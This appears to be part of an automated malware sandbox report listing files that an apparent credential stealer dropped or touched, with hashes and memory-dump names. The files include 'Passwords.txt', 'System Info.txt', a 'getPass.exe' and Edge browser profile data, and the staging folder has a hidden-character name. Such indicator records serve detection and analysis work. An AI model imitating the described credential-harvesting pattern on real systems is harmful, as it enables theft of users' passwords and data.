SHA256 d872470bec54c3c9fe1b7f1df2f6ce91cce78eae48e211fb418c6b3f7e26fde2
SHA512 ec4e290ecf205a3ea83206806ebb02595299dd984c59d1fa86652401c09e2e95ac675fc1dd5e420acfcdf4a52d6aae26150728b3061196ef7080f6bf39cc075b

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Videos.txt

MD5 ac7a758dadda57c6ae8da26875554b7d
SHA1 c06253bc1b6783a7f9787a68ab83bdbf85bfe105
SHA256 a7841616bebe3493a10336ec93226428b62e177cf19ba77036a28ed84b6d4bc6
SHA512 cbc48f5097f5aa5c4ad08c71e5c09abe01d98994f41e2f417773becc926c90376ca141c8a15702d7a083006d5e0ddf17f0df475bd5b7ec490d56c3f5606bf013

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Pictures.txt

MD5 b05e0edef4b889eb598b3397982c7a90
SHA1 5c9cd500afd71ef3bc696bcc9207d79dd19818c5
SHA256 a406c0965a97aec31e6a14b743b20b11465cca026d28a3ce04aef6203d70d7cd
SHA512 27d402f85feed54946186a60bf56108d791e8b40339f916e8fc090c63c9871fdb1cd9229fc9480e2dba34fdd8a4bc2f045b3e752c6697c47503c6ec0286b43b5

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Music.txt

MD5 5144f3ee1a7a89bb059db088fc9c1e58
SHA1 9af4a4d6e09044e125b3ef3de028cf6ac2cc274c
SHA256 506d442d15e5d5b8f933af65d26fe426ef7d871ddeac920d348cababc262d9cb
SHA512 8e07459ffa2e3f24d5e6b4c6b6c0063afcd969e14bb2682bdcdff7ae311bedacfde937040149c7a1583f04bbb2a5169b6d8c24de2066fdddd06c90238e00909e

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Downloads.txt

MD5 30f083e6c1743f3a26e0db53fb7e79db
SHA1 c38acaef84c23a31ec6a9d038bf51009fa5bfd5f
SHA256 3604ec2d888e6ccb0692d213489f542b94a68ffe4b836a7a7f429faba18dc0f0
SHA512 d88271cfdfd901486b080e66ecd576d3c37e1444f4c0d6a8727144d7ec94bb0b3b97d22a83b3feebaa2eb0d2ce5ff8ece1ba949b6b6b3ca5cc43364ca0c92d2c

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Documents.txt

MD5 7a6214e23ecf21734487593f73774ac5
SHA1 4349bd0ef6c7c30230a741b0fdd7b42a06b3132a
SHA256 f6eae2809f0a3bace078ae8ab686781e6f4792f59f4d031fd3c8133c9c384305
SHA512 4899fbc423d7dbafadf005b8b57f45de70c169632e3102fb25c0baf0a0af6e8d8b55e90c1dce9e0feae173689cb84ff94d68dc3fa420d6de886f54ee56f58713

C:\Users\Admin\AppData\Local\Temp\    ‌\Directories\Desktop.txt

MD5 879de7cc276687db8a4cf1841557eabc
SHA1 471f488c928a064d6979a09c3ae97f41e01e2bd9
SHA256 cf0c11a68d3ef7303de9e7c3d4260f73a6bd506f3ffc2fdf54f8f5a3356a4583
SHA512 63cd28eca4ea9bd3e0a0e819e60a07f101959eb7c3615f8d4ca96f4d48203f7032b32018322e8ccfefdbace6fa971c54bcfcfbda21a3a4e6592fb4dba45e456d

memory/1600-1841-0x0000000000400000-0x0000000000484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ‌\Credentials\Passwords.txt

MD5 5b942c6c172258e5df1bb702268e1ba0
SHA1 7db6a3e7c8c7249108b91f2a0015ac7a7e937c83
SHA256 723ae3d596c4705f8eb8045481e62a66e12dac5a7ac4374b962123619b9fd9af
SHA512 3d85ef7c0660e0dbbe48f65e1eecd6737479a2357dbd768a235a2708788b5a809aa822089f6396b7414fadb8b2744e50d0203b0bf6cdd5f03426d80fe7feecef

C:\Users\Admin\AppData\Local\Temp\    ‌\System\System Info.txt

MD5 0a22dbb3ab8d753f88545181eed210d1
SHA1 e5c92437cad8251956adbd30647fa6b8d10ecf55
SHA256 cb02bdc0ea798af0d2ff2b19431cc85737e940a1328e3f849880a589db4c00ed
SHA512 1e099125673155531632ea272742b585118286f955de84577bbbab523394d0c5cd09580e2f6db2a3835567ff3d0abb365288dce4e89135a2cab9078dd0d54f69

memory/5616-1896-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5616-1901-0x00007FF9834B0000-0x00007FF9834DE000-memory.dmp

memory/5616-1902-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5616-1903-0x00007FF974D10000-0x00007FF974DC8000-memory.dmp

memory/5616-1907-0x00007FF96E1B0000-0x00007FF96E31F000-memory.dmp

memory/5616-1908-0x00007FF968140000-0x00007FF968390000-memory.dmp

memory/5616-1911-0x00007FF96F210000-0x00007FF96F32C000-memory.dmp

memory/5616-1913-0x00007FF968390000-0x00007FF96897A000-memory.dmp

memory/5616-1914-0x00007FF983AD0000-0x00007FF983AFD000-memory.dmp

memory/5616-1915-0x00007FF983CE0000-0x00007FF983CF9000-memory.dmp

memory/5616-1916-0x00007FF983900000-0x00007FF983919000-memory.dmp

memory/5616-1918-0x00007FF9834B0000-0x00007FF9834DE000-memory.dmp

memory/5616-1919-0x00007FF96B300000-0x00007FF96B675000-memory.dmp

memory/5616-1917-0x00007FF98BEC0000-0x00007FF98BECD000-memory.dmp

memory/5616-1920-0x00007FF974D10000-0x00007FF974DC8000-memory.dmp

memory/5616-1921-0x00007FF983490000-0x00007FF9834A4000-memory.dmp

memory/5616-1922-0x00007FF98BB50000-0x00007FF98BB5D000-memory.dmp

memory/5616-1923-0x00007FF983210000-0x00007FF983233000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 abd37fffd21f2aaa6c5c8b255d195e57
SHA1 406ddacfcf7dbcc26f21c0c2743f20500c4d201a
SHA256 49494adf4ff74c4d5752f26a323a124805815597d948279903dffc92b24bc718
SHA512 4ac9e3b3f5fd8333dc354887cf3711b7e736500363b994c0e21128827dda886464d9537c79bc681acea44a8d660579f0f948c8cda94a915f22d0824b280da05a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6defa152c7ec8651221610d78aae59b6
SHA1 9d76ade7c5326d61b9ed290cdb7af22ba3707271
SHA256 8dd7a7a8d1b1aaa7d2b5a83b335598519744154ee1e8b319302633531f02b315
SHA512 d6352513c71407b259bf41569036c69c4a3fc300eb33728b16f1d4994a2aa43bc86cfcd86389f8213213f3c69572d8f5f003e0fcf49d9d5c460a24292a456e8a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8e8b05c6c357c7e60d276fcc74fa896e
SHA1 f88eb6a7f4d1428bccb2a8496e596f30b407134d
SHA256 b2ac9f202fc094fdb4633646ee77f7f2a3e1be1d65356f9ef4902cc370fdca25
SHA512 f7f2cf5dc19949b8eda892a42947ba3fb6e2a65ef4059ffe728f599e8d0a6e19df7ffca55f2846db3cc99ac5953bf4503f4c25edc904b17f09ee9651bbd88b23

C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe

MD5 459c755800f6394bfced303c0f9002d0
SHA1 710ab70b5498c0b2094997cb63898475af859388
SHA256 2155b81fb8e4fb169bbdce891d542edd5be8cf14748a6e6e7d03edb28d5efc42
SHA512 b4258b05709d4163210f28fc1bbc4935e9b681c65c48f3255842cf46f07fa34889f50593f8497113ec97e47271da1d6b13048fe70435219b3f7f48910225a2b4

C:\Users\Admin\AppData\Local\Temp\bhv8FBF.tmp

MD5 402b056e71a82f6cfed3b2624f3ad8e6
SHA1 f27df71042785e51506aba7b985cf3bed137ee13
SHA256 1b286eb6bc82d2c8936d28b40c5865d3755a910658fd3d8a9dc113aadf385539
SHA512 dee77c32ef48d3f99c1e72510db3db801c467655b5614d58f2e60db286f3c4546dde076cc1a33ea9ff407c0248a23f41d28cebcd0752d360360178ebc08d1cf6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 03ac0fde74553a8a62c0200a7b158586
SHA1 9a8826b24f6b67aa5c1b334a94960c61dc1be114
SHA256 b7dfd3b43c270c2fca1b9197066240e786278684b6894508e5ca12dc9dec4c3a
SHA512 5f99538a32bfc71a6ed6e07eb28e57c550b31eb9d9c9c7c0589a8f7ffb33dff8b61a2b2c0a8814a2484f56d6e0f92c4a8c2642ad97671e59320a33bfd2546aba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f1f7ff0beea982152c6c5ec1cfda4e7c
SHA1 2c39bca19cb5db6a214360c218c8fcf0bd596dba
SHA256 f8b5db994859c4bd0c0fa249f413b1f4b32062f9ba8ceb73ff1495fc99fbf7bb
SHA512 b27517e14f24a532216dbbcbcbf0505696e8ee29ae9feb3b3b77a13f73eef50046fd0afc87afb1dc062ed9da336dfbd9aad3475e9905b829606d132e577b7707

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 74d34b064a2a6dfd56f7d999e08fa854
SHA1 a1d921de04e69aae50b27fc78cd086f1548a2ead
SHA256 0427ed4fe4b40c5c05ad0067ff480738045ed4a26ba55491df1ebb4b3071f320
SHA512 95e2998bb796b8dcbbc8f92dfa4fb3065df648f8a260a29ae98ed5a7b70436de36071ac0d3f10a85638dce949d9c431438be654567fbb67dd1a34562d8b7bade

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c9de117127f11e579d0f84ef4d232042
SHA1 19cd221ae88ae8fe57b761049f459cbc77e02faa
SHA256 d0fc86f3cd114e7a001dd94c505edfe17e0c9041527401cba0bf4008e494747f
SHA512 9e0e623ad9a058a151e13ddb765b1d912ebec1e4d991eccc5dda99cb59e14cb5b7581509b569c9aa88b670a0076a90e33fe44cd334187fd0aca2d529be78c34e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62d3e5c3f2c46af9e9809766be4fce99
SHA1 55a1d8c2c3897458a1a3ec733696eaed590fb22d
SHA256 ba43f78770f92d1255c2b8aad7cb43cc03ec1fe2e24aa0744a82485e021554ce
SHA512 f01a86f4e3d3320ee67904d88309a8ec6570970479901d5d650894fd434506eb744c213c9ffc625061eac7559ca57522bc18d314e42fc58bff6efe763563e370

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 522971d4eefb6046b35f5dfe12c3f9bf
SHA1 ce508a35ce2b953b2d9e2d133ded2d4ffc77c8ee
SHA256 246b59cda54f6a06c63adb9452dc8a043f6a8d65b98fcb5dfb55dd8784aedea0
SHA512 15d5a11ab4a7c0f2882d72422d4725ed1f5890843c10539930ff0d00cf18411ab1f244c5206e8dd614033e23f1b4693a5bfa9b92ef43f5e99a0341937d6ea6b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 be8342356f389da579eb8aeb8f1e0221
SHA1 4265783a50f9798d8858e6522e9d43f3fadd7601
SHA256 0e46b5a70ae33046f0ed712a73a35f686b888eeda1b0e86349f88d7db02ed884
SHA512 bbfee8e0d7cc3f83f449ef037c428ededfe2915223601621541849aca71c7df0dd0f4d9a4d265f47d3983d4896cf09937f80867ddd38f58c22108e364f5e3505

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e93643575209445fdfcf67c7891de10e
SHA1 b81100dd8aeb9c062fdb34d51df21d585457b84a
SHA256 6eb970c2cc74c093069606971139804efaa577fb1ec5e13558e1e057c8ee2331
SHA512 e2986c17e1e3e96ae72c8aaf2e453082749fb3ea93e0e45d30a1d567c49b111f4db4301d96e1912fe1470aec34a410c37f70febfe8e2652d8e8e246950ba19fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 cdc2e1142f7a45ca0092cf691e7ae552
SHA1 4bcead2b4a1ea733baed5dda5209323650ca7b10
SHA256 2d0fb1368a9bdbf309d7097a857ab2cd204fbdfe344df8eb4dbc2e9b8c4e8005
SHA512 25e8b6dd54e04d669f65407d779c5f96d5d191479162fa8b6774c4bbb96e38caff9b635a962de91cfbd03cdd3377dc2e9a150489176e8dcbe6bb60886ea9d719

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 707144fcdcbf1f66a028204e1242a55b
SHA1 4c68239734b3f63945ba8849b750723351393cd0
SHA256 e468830d52be1e92862560c93da058666e1b3a3f695a4d722158ad7e93005a67
SHA512 ae6f7ff7327a7dc6ccbc11d8dc35f51a11d5f4e391c4b1489aba749c382f64e39bdc22e157271f2890b23b9b552520033e4852a96b9174bb4ba23c9400d4ed34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 71db317f162daf1a7306ac00ca6120f4
SHA1 7480782b3986854f413897e4db5dfcbb4fbd4322
SHA256 a7ae6a520b90ea76aaafedd7184a240237129d1395d68cd82a69a1eff0b3303c
SHA512 b925cace0926a89a077576db21e47e445845e633474c6d1b9f8be607b787eccc53a340eeb94db1101391cf41d89e6bd15766b5778ee4d4820a316a2b3bc88b37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c86d1de891d3adffdaa381bc8e903740
SHA1 4f1fbb373e70f913b871eb0cf53137b4aa3383a1
SHA256 74e5f552626345c62c599bdb5f09c9414deb068311018f17f0a7f478d585f89e
SHA512 57b3990c6345837452040d83680870acae4bc90fed615283519b917d608c1ed1d8187a773b990314aa561b3651280383eb6be2feace06a851832543ff0ec97d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e6e95077d3d0f7099008592013a19f78
SHA1 f13e3cab5138dfdad4786b9a6f338390841a3f94
SHA256 5bb4911ec2b9dcc94a6177cc254bc72edfff6f5a000a9e91d14b5e5fc87d82dc
SHA512 ffc2211f3d377ebc245f03c5ed0667dde023afbfb931158d80ca84923664def832a28b696e51f81271604fc244ea25409d0720a817b738177f28db9b72a6248c